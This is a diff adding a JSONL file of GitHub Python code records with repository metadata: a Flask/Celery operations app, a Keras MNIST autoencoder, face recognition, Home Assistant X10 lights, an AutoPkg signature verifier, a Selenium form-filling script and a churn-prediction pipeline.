diff --git "a/436.jsonl" "b/436.jsonl" new file mode 100644--- /dev/null +++ "b/436.jsonl" @@ -0,0 +1,750 @@ +{"seq_id":"11223719401","text":"import os\nimport json\n\nfrom flask import render_template, redirect\nfrom flask.globals import g\nfrom flask.helpers import url_for\n\nfrom app import app\nfrom app.auth import login_required\nfrom app.db import get_db\nfrom app.tasks import (\n read_finish_continue,\n read_start,\n read_next,\n start_parsing,\n should_pause,\n save_state,\n)\nfrom app.tappable import tappable\nfrom app.utils import deserialize_chain, b64encode_id, b64decode_id\n\n\n@app.route(\"/operations\")\n@login_required\ndef operations_index():\n # Page to view all operations under a user\n db = get_db()\n\n operation_ids = map(\n b64encode_id,\n (\n x[\"id\"]\n for x in db.execute(\n \"SELECT id FROM operations WHERE requester_id = ?\", (g.user[\"id\"],)\n ).fetchall()\n ),\n )\n\n operations = {i: url_for(\"operation_info\", operation_id=i) for i in operation_ids}\n return render_template(\"operations/index.html\", operations=operations)\n\n\n@app.route(\"/operations/\")\n@login_required\ndef operation_info(operation_id):\n # Get information about an operation by id\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation[\"completion\"] == \"COMPLETED\":\n # Load the result from json file if operation is complete\n with open(operation[\"result_store\"], \"r\") as f:\n result = json.load(f)\n else:\n # Otherwise, result should just be an empty string\n result = \"\"\n return render_template(\n \"operations/operation.html\",\n operation_id=b64encode_id(operation_id),\n status=operation[\"completion\"],\n result=result,\n )\n\n\n@app.route(\"/operations/start\", methods=(\"POST\",))\n@login_required\ndef start():\n # Start a csv reading + parsing operation\n db = get_db()\n\n # Insert a record of the operation and grab its id\n operation_id: int = db.execute(\n \"INSERT INTO operations (requester_id, completion) VALUES (?, ?)\",\n (g.user[\"id\"], \"IN PROGRESS\"),\n ).lastrowid\n\n \"\"\"\n Brief description of the operation\n ----------------------------------\n `read_start` initiates reading from the csv file\n `read_next`, then continues reading from the same file and\n merges its results with the previous read\n `read_finish_continue`, determines whether or not the file has been\n read in full and continues reading accordingly\n\n Once the iterative reading is finished, `start_parsing` is called\n to start the parsing operation\n \"\"\"\n csvpath = os.path.join(app.instance_path, \"MOCK_DATA.csv\")\n # Start the operation, using the usual tappable configuration\n tappable(\n # Chain of data reading + callback to data parsing\n read_start.s(csvpath)\n | read_next.s(csvpath)\n | read_finish_continue.s(start_parsing.s(operation_id), csvpath, operation_id),\n # Function to check whether or not operation should pause\n should_pause.s(operation_id),\n # Pause handler\n save_state.s(operation_id),\n ).delay()\n\n db.commit()\n return redirect(url_for(\"operation_info\", operation_id=b64encode_id(operation_id)))\n\n\n@app.route(\"/operations/pause/\", methods=(\"POST\",))\n@login_required\ndef pause(operation_id):\n # Request an operation to pause\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation and operation[\"completion\"] 
== \"IN PROGRESS\":\n \"\"\"\n Change operation status to \"REQUESTING PAUSE\" - next time\n the `app.tappable.pause_or_continue` task is called - it'll know\n it should pause\n \"\"\"\n db.execute(\n \"\"\"\n UPDATE operations\n SET completion = ?\n WHERE id = ?\n \"\"\",\n (\"REQUESTING PAUSE\", operation_id),\n )\n db.commit()\n return {\"operation_id\": b64encode_id(operation_id), \"success\": True}\n elif not operation:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Invalid operation ID\",\n }\n else:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Operation is no longer in progress\",\n }\n\n\n@app.route(\"/operations/resume/\", methods=(\"POST\",))\n@login_required\ndef resume(operation_id):\n # Resume an operation\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation and operation[\"completion\"] == \"PAUSED\":\n # Load the remaining workflow and the result (so far)\n with open(operation[\"workflow_store\"]) as f:\n workflow = json.load(f)\n with open(operation[\"result_store\"], \"r\") as f:\n result = json.load(f)\n # Initiate the remaining workflow and pass in the result\n # NOTE: The workflow itself is already tappable so pausing after\n # this point is also possible\n deserialize_chain(workflow).delay(result)\n\n db.execute(\n \"\"\"\n UPDATE operations\n SET completion = ?\n WHERE id = ?\n \"\"\",\n (\"IN PROGRESS\", operation_id),\n )\n db.commit()\n return {\"operation_id\": b64encode_id(operation_id), \"success\": True}\n elif not operation:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Invalid operation ID\",\n }\n else:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Operation is not paused\",\n }\n\n\n@app.route(\"/operations/cancel/\", methods=(\"POST\",))\n@login_required\ndef cancel(operation_id):\n # Cancel an operation altogether (only available after pausing)\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation and operation[\"completion\"] == \"PAUSED\":\n db.execute(\n \"\"\"\n UPDATE operations\n SET completion = ?\n WHERE id = ?\n \"\"\",\n (\"CANCELLED\", operation_id),\n )\n db.commit()\n return {\"operation_id\": b64encode_id(operation_id), \"success\": True}\n elif not operation:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Invalid operation ID\",\n }\n else:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Operation is not paused\",\n }\n","repo_name":"TotallyNotChase/resumable-celery-tasks","sub_path":"app/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"12159540808","text":"\"\"\"\nCreated on Sun Nov 18 19:56:10 2018\n\n@author: Guillherme\n\nStacked Autoencoder for denoising images (mnist dataset)\n\nSource: https://blog.keras.io/building-autoencoders-in-keras.html?fbclid=IwAR1g_unok9zikI1bdf4Cox5HX6lxMpW9zbLwX91jhNsYodHLbgL_dZ_BfCM\n\"\"\"\n\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Input, Dense\nimport numpy 
as np\nimport matplotlib.pyplot as plt\n\n# Obtenção do dataset\n(x_train, _), (x_test, _) = mnist.load_data()\n\n# Normalização\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\nx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\nx_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:])))\n\n# Adição do ruído \nnoise_factor = 0.5\nx_train_noisy = x_train + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_train.shape) \nx_test_noisy = x_test + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_test.shape) \nx_train_noisy = np.clip(x_train_noisy, 0., 1.)\nx_test_noisy = np.clip(x_test_noisy, 0., 1.)\n\n# Plot, Linha 1 imagem original e linha 2 a imagem com ruído\n# Apenas as 10 primeiras imagens\nn = 10 # how many digits we will display\nplt.figure(figsize=(20, 4))\nfor i in range(n):\n # display original\n ax = plt.subplot(2, n, i + 1)\n plt.imshow(x_test[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display noisy\n ax = plt.subplot(2, n, i + 1 + n)\n plt.imshow(x_test_noisy[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()\n\ninput_img = Input(shape=(784,))\nencoded = Dense(128, activation='relu')(input_img)\nencoded = Dense(64, activation='relu')(encoded)\nencoded = Dense(32, activation='relu')(encoded)\n\ndecoded = Dense(64, activation='relu')(encoded)\ndecoded = Dense(128, activation='relu')(decoded)\ndecoded = Dense(784, activation='sigmoid')(decoded)\n\n# Modelo\nautoencoder = Model(input_img, decoded)\n# O otimizador ajusta a taxa de aprendizagem\n# A função para calcular o loss é a binary_crossentropy\nautoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')\n\n# Executa o modelo\nautoencoder.fit(x_train_noisy, x_train,\n epochs=100,\n batch_size=256,\n shuffle=True,\n validation_data=(x_test_noisy, x_test))\n\nW = autoencoder.get_weights()\nnp.save('SAE_W.npy', W)\n# A linha abaixo inicializa a rede com os pesos de um treinamento anterior\n#W = np.load('SAE_W.npy')\n#autoencoder.set_weights(W)\n\n# this model maps an input to its encoded representation\n# Encoder, representação em 32 pixels da imagem\nencoder = Model(input_img, encoded)\nencoded_imgs = encoder.predict(x_test)\n\nencoded_input = Input(shape=(32,))\ndecoder = Model(encoded_input, autoencoder.layers[-3](encoded_input))\ndecoded_imgs = decoder.predict(encoded_imgs)\n\nencoded_input = Input(shape=(64,))\ndecoder = Model(encoded_input, autoencoder.layers[-2](encoded_input))\ndecoded_imgs = decoder.predict(decoded_imgs)\n\nencoded_input = Input(shape=(128,))\ndecoder = Model(encoded_input, autoencoder.layers[-1](encoded_input))\ndecoded_imgs = decoder.predict(decoded_imgs)\n\n# PLOT em 3 linhas\n# Linha 1 é a imagem original, linha 2 a imagem com ruído e linha 3 a imagem processada\nn = 10 # how many digits we will display\nplt.figure(figsize=(20, 4))\nfor i in range(n):\n # display original\n ax = plt.subplot(3, n, i + 1)\n plt.imshow(x_test[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display noise\n ax = plt.subplot(3, n, i + 1 + n)\n plt.imshow(x_test_noisy[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display reconstruction\n ax = plt.subplot(3, n, i + 1 + 2*n)\n plt.imshow(decoded_imgs[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n 
ax.get_yaxis().set_visible(False)\nplt.show()","repo_name":"GuillhermeAmaral/Machine-Learning","sub_path":"mnist_denoising.py","file_name":"mnist_denoising.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"40856285836","text":"import face_recognition\nimport os\nimport cv2\n\nKNOWN_FACES_DIR = \"known-face\"\nUNKNOWN_FACES_DIR = \"unknown-face\"\nTOLERANCE = 0.6\nFRAME_THICKNESS = 3\nFONT_THICKNESS = 2\nMODEL = \"cnn\" # try using \"hog\"\n\nprint(\"loading known faces\")\n\nknown_faces = []\nknown_names = [\"Justin Beiber\"]\n\n\n# encode each image in the known-faces directory exactly once\nfor filename in os.listdir(KNOWN_FACES_DIR):\n\timage = face_recognition.load_image_file(f\"{KNOWN_FACES_DIR}/{filename}\")\n\tencoding = face_recognition.face_encodings(image)[0]\n\tknown_faces.append(encoding)\n\n\n\nprint(\"Processing unknown faces\")\nfor filename in os.listdir(UNKNOWN_FACES_DIR):\n\tprint(filename)\n\timage = face_recognition.load_image_file(f\"{UNKNOWN_FACES_DIR}/{filename}\")\n\tlocations = face_recognition.face_locations(image, model=MODEL)\n\tencoding = face_recognition.face_encodings(image, locations)\n\timage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\tfor face_encoding, face_locations in zip(encoding, locations):\n\t\tresults = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)\n\t\tmatch = None\n\t\tif True in results:\n\t\t\tmatch = known_names[results.index(True)]\n\t\t\tprint(f\"Match found : {match}\")\n\n\t\t\ttop_left = (face_locations[3], face_locations[0])\n\t\t\tbottom_right = (face_locations[1], face_locations[2])\n\n\t\t\tcolor = [0, 255, 0]\n\n\t\t\tcv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS)\n\n\t\t\ttop_left = (face_locations[3], face_locations[2])\n\t\t\tbottom_right = (face_locations[1], face_locations[2]+22)\n\t\t\tcv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED)\n\t\t\tcv2.putText(image, match, (face_locations[3]+10, face_locations[2]+15), cv2.FONT_HERSHEY_COMPLEX, 0.5, (200,200,200), FONT_THICKNESS)\n\tcv2.imshow(filename, image)\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\n\n\n","repo_name":"immu0001/python-face_recognition-library-example","sub_path":"face-rec.py","file_name":"face-rec.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"13511195868","text":"# https://leetcode.com/problems/number-of-good-pairs/\n\nfrom typing import List\n\n\nclass Solution:\n    def numIdenticalPairs(self, nums: List[int]) -> int:\n        # count occurrences of each value, then sum n-choose-2 pairs per value\n        d = {}\n        for i in nums:\n            d[i] = d.get(i, 0) + 1\n\n        res = 0\n        for i in d:\n            res += d[i] * (d[i] - 1)//2\n\n        return res","repo_name":"anishrajan25/Leetcode","sub_path":"1512 Number of Good Pairs.py","file_name":"1512 Number of Good Pairs.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19482554673","text":"\"\"\"\nSupport for X10 lights using RF comms. \n\nI did this because for some reason one of my devices won't work with the CM11a,\nonly the CM17 \"firecracker\". 
Heyu already supports this; just needs to be\ncalled with `fon/off` rather than `on/off`\n\"\"\"\nimport logging\nfrom subprocess import CalledProcessError\n\nimport voluptuous as vol\n\nfrom homeassistant.const import (CONF_NAME, CONF_ID, CONF_DEVICES)\nfrom homeassistant.components.light import (\n    ATTR_BRIGHTNESS, PLATFORM_SCHEMA)\nfrom homeassistant.components.light.x10 import X10Light, x10_command\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n    vol.Required(CONF_DEVICES): vol.All(cv.ensure_list, [\n        {\n            vol.Required(CONF_ID): cv.string,\n            vol.Required(CONF_NAME): cv.string,\n        }\n    ]),\n})\n\n\nCM15_SINGLETON = None\n\ndef CM15_Factory():\n    # module-level singleton: declare global before assigning to it\n    global CM15_SINGLETON\n    if CM15_SINGLETON is None:\n        CM15_SINGLETON = CM15()\n    return CM15_SINGLETON\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n    \"\"\"Set up the x10 CM15 Light platform.\"\"\"\n\n    add_entities(X10CM15Light(light, CM15_Factory()) for light in config[CONF_DEVICES])\n\n\nclass X10CM15Light(X10Light):\n    \"\"\"Representation of an X10 RF Light.\"\"\"\n\n    def __init__(self, light, CM15):\n        \"\"\"Initialize an X10 Light.\"\"\"\n        X10Light.__init__(self, light, False)\n        self._cm15 = CM15\n\n    def turn_on(self, **kwargs):\n        \"\"\"Instruct the light to turn on.\"\"\"\n        self.send_command(self._id, \"ON\")\n        self._brightness = kwargs.get(ATTR_BRIGHTNESS, 255)\n        self._state = True\n\n    def turn_off(self, **kwargs):\n        \"\"\"Instruct the light to turn off.\"\"\"\n        self.send_command(self._id, \"OFF\")\n        self._state = False\n\n    def send_command(self, code, command):\n        self._cm15.open()\n        self._cm15.sendCommand(code.upper(), command.upper())\n        self._cm15.close()\n\n    def update(self):\n        \"\"\"Fetch update state.\"\"\"\n        pass\n","repo_name":"snicker/twohunnid_ha","sub_path":"custom_components/x10cm15/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"26073433964","text":"import Tkinter as tk\n\nclass Tool:\n    def __init__(self, id, name, command):\n        self.id = str(id)\n        self.name = str(name)\n\n        # commands\n        self.command = command\n\n        # vars\n        self.checkVar = tk.IntVar()\n\n    def getRadioButton(self, root, var=None, row=0, column=0):\n        # keep a reference to the widget; grid() returns None, so don't chain it\n        self.radioButton = tk.Radiobutton(\n            root,\n            variable=var,\n            value=self.id,\n            text=self.name,\n            command=self.onChange,\n            width=8,\n            indicatoron=False,\n            borderwidth=1\n        )\n        self.radioButton.grid(row=row, column=column, sticky=tk.NW)\n\n    def getCheckButton(self, root, row=0, column=0):\n        self.checkButton = tk.Checkbutton(\n            root,\n            command=self.onChange,\n            variable=self.checkVar,\n            text=self.name,\n            width=8,\n            indicatoron=False,\n            borderwidth=1\n        )\n        self.checkButton.grid(row=row, column=column, sticky=tk.NW)\n\n    def onChange(self):\n        self.command(self)\n","repo_name":"meatbags/rotokit","sub_path":"src/tools/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19066035078","text":"# ========================\n# Created by 3P[0]. 
;)\n#\n# %%%%%%%%%\n# %% %%\n# %%\n# %% %%\n# %% %% %%\n# %% %% %%\n# %%%%%%\n# %%\n# %%\n#\n# ========================\n\nfrom glob import glob\n\npath = '' # set the path here\ndirectoryPath = path + \"*.\"\nfileExtensions = [\"PHP\"]\nlistOfFiles = []\n\nfor extension in fileExtensions:\n\tlistOfFiles.extend(glob(directoryPath + extension))\n\nfor file in listOfFiles:\n\tprint(\"- Listando arquivos -\")\n\tprint(file)","repo_name":"pauloogliano/list-files-python","sub_path":"list.files.py","file_name":"list.files.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39594463419","text":"#!/usr/local/autopkg/python\n\"\"\"\nSee docstring for WinSignatureVerify class\n\"\"\"\n\nfrom subprocess import check_output, CalledProcessError\nimport re\n\nfrom autopkglib import ( # pylint: disable=import-error,unused-import\n    Processor,\n    ProcessorError,\n)\n\n__all__ = [\"WinSignatureVerify\"]\n\n\nclass WinSignatureVerify(Processor): # pylint: disable=too-few-public-methods\n    \"\"\"\n    Requires:\n    - https://github.com/mtrojnar/osslsigncode\n    \"\"\"\n\n    description = __doc__\n    input_variables = {\n        \"pathname\": {\n            \"required\": True,\n            \"description\": \"Full file path to verify\"},\n        \"expected_subject\": {\n            \"required\": False,\n            \"description\": \"The expected Signer's Certificate\",\n        },\n        \"expected_signature\": {\n            \"required\": False,\n            \"description\": \"The expected CurrentDigitalSignature\",\n        },\n    }\n    output_variables = {\n        \"signature_verify\": {\"PASS or FAILED signature verification\"},\n    }\n    cmd = [\n        # for intel\n        #\"/usr/local/bin/osslsigncode\",\n        \"/opt/homebrew/bin/osslsigncode\",\n        \"verify\",\n    ]\n    cert_info = None\n\n    def convert_bytes_to_string(self, bytes_obj):\n        \"\"\"Accept a bytes object and return utf-8 string\"\"\"\n        return bytes_obj.decode(\"utf-8\")\n\n    def find_pattern_first_match(self, pattern):\n        \"\"\"Returns the first specified regex match group\"\"\"\n        results = re.search(pattern, self.cert_info)\n        try:\n            return results.group(1)\n        except AttributeError:\n            return None\n\n    def get_cert_digitalsignature(self):\n        \"\"\"Searches cert data for matching expected signature and returns\n        the match\"\"\"\n        expected_signature = self.env[\"expected_signature\"]\n        return self.find_pattern_first_match(\n            f\"Current DigitalSignature.+: ({expected_signature})\\\\nCa\"\n        )\n\n    def get_cert_subject(self):\n        \"\"\"Searches cert data for matching expected subject and returns\n        the match\"\"\"\n        expected_subject = self.env[\"expected_subject\"]\n        return self.find_pattern_first_match(\n            f\"Signer's certificate:\\\\n.+\\\\n.+Subject: ({expected_subject})\\\\n\"\n        )\n\n    def run_cmd(self):\n        \"\"\"Runs a shell command and returns its output, returns None on failure\"\"\"\n        full_command = self.cmd + [self.env[\"pathname\"]]\n        try:\n            return check_output(full_command).decode(\"utf-8\")\n        except CalledProcessError:\n            return None\n\n    def main(self):\n        \"\"\"gimme some main\"\"\"\n        self.cert_info = self.run_cmd()\n        if self.cert_info is not None:\n            if self.get_cert_subject() and self.get_cert_digitalsignature():\n                self.env[\"signature_verify\"] = \"PASSED\"\n            else:\n                self.env[\"signature_verify\"] = \"FAILED\"\n\nif __name__ == \"__main__\":\n    PROCESSOR = WinSignatureVerify()\n    
PROCESSOR.execute_shell()","repo_name":"Arequ/autopkg_recipes","sub_path":"SharedProcessors/WinSignatureVerify.py","file_name":"WinSignatureVerify.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16728169440","text":"import time\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys\n\n# 653614758457\ndelay = 3\nweb = webdriver.Chrome()\nweb.get('http://www.scholarships.punjab.gov.in/')\n\n\nfor _ in range(2):\n    registration = web.find_element_by_id(\"studentreglnk\")\n    registration.click()\n\n\n# selecting quota\nquota = Select(web.find_element_by_id(\"ddlQuota\"))\nquota.select_by_visible_text('Non-Management Quota')\nprint(\"Success !\")\n\n# entering aadhar number\naadar = web.find_element_by_xpath('//*[@id=\"txtCardno\"]')\naadar.send_keys(input(\"Enter aadhar card number : \"))\nprint(\"Success !\")\n\n# entering DOB number\ndob_is = input(\"Enter Date Of Birth (25/12/2000): \")\nfor _ in range(2):\n    dob = web.find_element_by_xpath('//*[@id=\"TxtDOB\"]')\n    dob.send_keys(dob_is)\nprint(\"Success !\")\n\n# entering First name\nfirst_name = web.find_element_by_xpath('//*[@id=\"txtFirstName\"]')\nfirst_name.send_keys(input(\"Enter Your First Name : \"))\nprint(\"Success !\")\n\n# entering MIDDLE name\nMIDDLE_name = web.find_element_by_xpath('//*[@id=\"txtMiddleName\"]')\nMIDDLE_name.send_keys(\n    input(\"Enter Your MIDDLE Name : (LEAVE EMPTY IF YOU DON'T HAVE ANY)\"))\nprint(\"Success !\")\n\n# entering LAST name\nLAST_name = web.find_element_by_xpath('//*[@id=\"txtSurname\"]')\nLAST_name.send_keys(input(\"Enter Your LAST Name : \"))\nprint(\"Success !\")\n\n# selecting Gender\nGender = Select(web.find_element_by_id(\"ddlGender\"))\nGender.select_by_visible_text(input(\"Enter YOur Gender : \"))\nprint(\"Success !\")\n\n# agree ?\n\nproceed = web.find_element_by_xpath('//*[@id=\"btnconsentAgree\"]')\ntxt = input(\"Type 'Y' if above info is correct else 'N' : \")\nif(txt == 'Y'):\n    proceed.click()\n    print(\"Success !\")\nelse:\n    print(\"Run Script again !\")\n    \n# if(web.find_element_by_xpath('//*[@id=\"txtFatherName\"]').is_enabled() == False):\n#     web.close()\n# else:\n# entering father name \nfather_name = web.find_element_by_xpath('//*[@id=\"txtFatherName\"]')\nfather_name.send_keys(input(\"Enter YOur Father's Name : \"))\n\n# entering Mother name \nMother_name = web.find_element_by_xpath('//*[@id=\"txtMotherName\"]')\nMother_name.send_keys(input(\"Enter YOur Mother's Name : \"))\n\n# selecting Religion\nReligion = Select(web.find_element_by_id(\"ddlReligion\"))\nReligion.select_by_visible_text(input(\"Enter YOur Religion (Hindu/Christian/Muslim/Sikhism) : \"))\nprint(\"Success !\")\n\n# selecting Category\nCategory = Select(web.find_element_by_id(\"ddlCategory\"))\nCategory.select_by_visible_text(input(\"Enter YOur Category (SC/OBC) : \"))\nprint(\"Success !\")\n\n# selecting IsDtribes\nIsDtribes = Select(web.find_element_by_id(\"ddlIsDtribes\"))\nIsDtribes.select_by_visible_text(\"No\")\n\n# enter your mobile number\nMobile_Number = web.find_element_by_xpath('//*[@id=\"txtPMobile\"]')\nMobile_Number.send_keys(input(\"Enter YOur 10 digits Mobile Number : \"))\nprint(\"Success !\")\n\n# selecting State\nState = Select(web.find_element_by_id(\"DdlState\"))\nState.select_by_visible_text(input(\"Enter YOur State name : 
\"))\nprint(\"Success !\")\n\n# enter your Address\nAddress = web.find_element_by_xpath('//*[@id=\"txtAddress\"]')\nAddress.send_keys(input(\"Enter YOur Full Address : \"))\nprint(\"Success !\")\n\n# selecting District\nDistrict = Select(web.find_element_by_id(\"DdlDistrict\"))\nDistrict.select_by_visible_text(input(\"Enter YOur District name : \"))\nprint(\"Success !\")\n\n# enter your PinCode\nPinCode = web.find_element_by_xpath('//*[@id=\"txtPinCode\"]')\nPinCode.send_keys(input(\"Enter YOur Pin Code : \"))\nprint(\"Success !\")\n\n# selecting chkSameAdd\nchkSameAdd = web.find_element_by_id(\"chkSameAdd\").click()\nprint(\"DONE !\")\n\n# Entering Captcha\nelem = web.find_element_by_xpath('//*[@id=\"mainCaptcha\"]')\nelem.send_keys(Keys.CONTROL, 'a') #highlight all in box\nnew_elem = elem.send_keys(Keys.CONTROL, 'c')\nelem_2 = web.find_element_by_xpath('//*[@id=\"txtVerifyCaptcha\"]')\nelem_2.send_keys(Keys.CONTROL, 'v')\nprint(\"SUCCESS !\")\n","repo_name":"amnindersingh12/AUTOMATE-SCHOLARSHIP-REGESTRATION-FORM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6019440927","text":"# pip install pandas\r\n# pip install scikit-learn\r\n\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split, GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.pipeline import Pipeline,make_pipeline\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom scipy.stats import chi2_contingency\r\n\r\n\r\nfrom tpot import TPOTClassifier \r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\ndata = pd.read_excel(r\"E:\\sunbase\\customer_churn_large_dataset.xlsx\")\r\n\r\n# Data Preprocessing\r\n\r\n# Basic Eda\r\ndata.shape\r\ndata.columns\r\ndata.info()\r\ndata.isnull().sum()\r\ndata.describe()\r\ndata.duplicated().sum() \r\n \r\ndf = data.drop(columns=['CustomerID', 'Name'])\r\ndf['Churn'].value_counts(normalize = True) # Balanced Dataset\r\n\r\n# Detect outliers\r\ncon_var = ['Age', 'Subscription_Length_Months', 'Monthly_Bill', 'Total_Usage_GB']\r\nplt.figure(figsize=(2, 50))\r\nfor i, col in enumerate(con_var, 1):\r\n plt.subplot(len(con_var),1, i)\r\n plt.boxplot(df[col])\r\n plt.title(col)\r\n\r\nfor col in con_var:\r\n plt.figure(figsize=(8, 6)) # Adjust the figure size as needed\r\n plt.hist(df[col], bins=20) # You can adjust the number of bins as needed\r\n plt.title(f'Histogram of {col}')\r\n plt.xlabel(col)\r\n plt.ylabel('Frequency')\r\n plt.show()\r\n \r\n \r\n\r\n# Feature Engineering\r\n\r\n# we can take avg monthly usage as a feature \r\n# add avg monthly data usage\r\ndf['Avg Monthly_Data_Usage'] = df['Total_Usage_GB'] / df['Subscription_Length_Months']\r\n\r\n# we can create age groups\r\nage_bins = [0, 18, 30, 50, float('inf')] # Age ranges\r\nage_labels = ['Teenager', 'Young Adult', 'Adult', 'Senior']\r\n\r\n# Add a new column for age groups\r\ndf['Age_Group'] = pd.cut(df['Age'], bins=age_bins, labels=age_labels)\r\ndf = df.drop(columns = ['Age'])\r\nplt.hist(df['Age_Group'], bins =20)\r\n\r\n# checking feature importance\r\n# correlation of categorical column with target column\r\ncontingency_table = pd.crosstab(df['Gender'], df['Churn'])\r\ncontingency_table\r\nchi2 = 
chi2_contingency(contingency_table)\r\nchi2 # 'Gender' doesn't have significant impact in target variable\r\ndf = df.drop(columns = ['Gender'])\r\n# arrange columns in order\r\ndf = df[['Age_Group', 'Location', 'Subscription_Length_Months','Avg Monthly_Data_Usage', 'Monthly_Bill', 'Total_Usage_GB', 'Churn' ]]\r\n\r\n# Input and Output Split\r\npredictors = df.drop(columns=['Churn'])\r\ntarget = df['Churn']\r\n\r\n# Splitting data into training and testing data set\r\nx_train, x_test, y_train, y_test = train_test_split(predictors, target, test_size = 0.3, random_state=0)\r\n\r\n# Encoding categorical variables\r\n#x_train['Gender'].value_counts(normalize = True)\r\nx_train['Location'].value_counts(normalize = True)\r\nx_train['Age_Group'].value_counts(normalize = True)\r\n\r\ntrf2 = ColumnTransformer([('ohe', OneHotEncoder(sparse= False, handle_unknown='ignore'),['Location', 'Age_Group'])]\r\n ,remainder= 'passthrough')\r\nencod = trf2.fit_transform(x_train)\r\nencod_df = pd.DataFrame(encod)\r\n\r\n# Apply feature scaling\r\ntrf3 = ColumnTransformer([('scaler', MinMaxScaler(), encod_df.columns[:15])])\r\nscaled = trf3.fit_transform(encod_df)\r\nscaled_df = pd.DataFrame(scaled)\r\n\r\n# Using TPOT classifier to findout the best model\r\ntpot_clf = TPOTClassifier(generations=2, population_size=50, scoring='accuracy', verbosity=2, random_state=1, n_jobs=-1)\r\ntpot_clf.fit(x_train, y_train)\r\ntpot_clf.export('best_model.py')\r\n\r\n#best model from Auto ML\r\nbest_model = KNeighborsClassifier(n_neighbors=18, p=1, weights=\"uniform\")\r\n#best_model.fit(x_train,y_train)\r\n\r\nmodel_pipeline = make_pipeline(trf2,trf3,best_model)\r\nmodel_pipeline.fit(x_train,y_train)\r\n\r\ny_pred = pd.Series(model_pipeline.predict(x_test))\r\ny_train_pred = pd.Series(model_pipeline.predict(x_train))\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\ntest_score = accuracy_score(y_test, y_pred)\r\nprint(test_score)\r\n\r\n\r\ntrain_score = accuracy_score(y_train, y_train_pred)\r\nprint(train_score)\r\n\r\nfrom sklearn.metrics import classification_report\r\nprint(classification_report(y_test,y_pred)) \r\n\r\nimport pickle\r\npickle.dump(model_pipeline,open('model_pipeline1.pkl','wb'))\r\n\r\n# Other MOdel Results 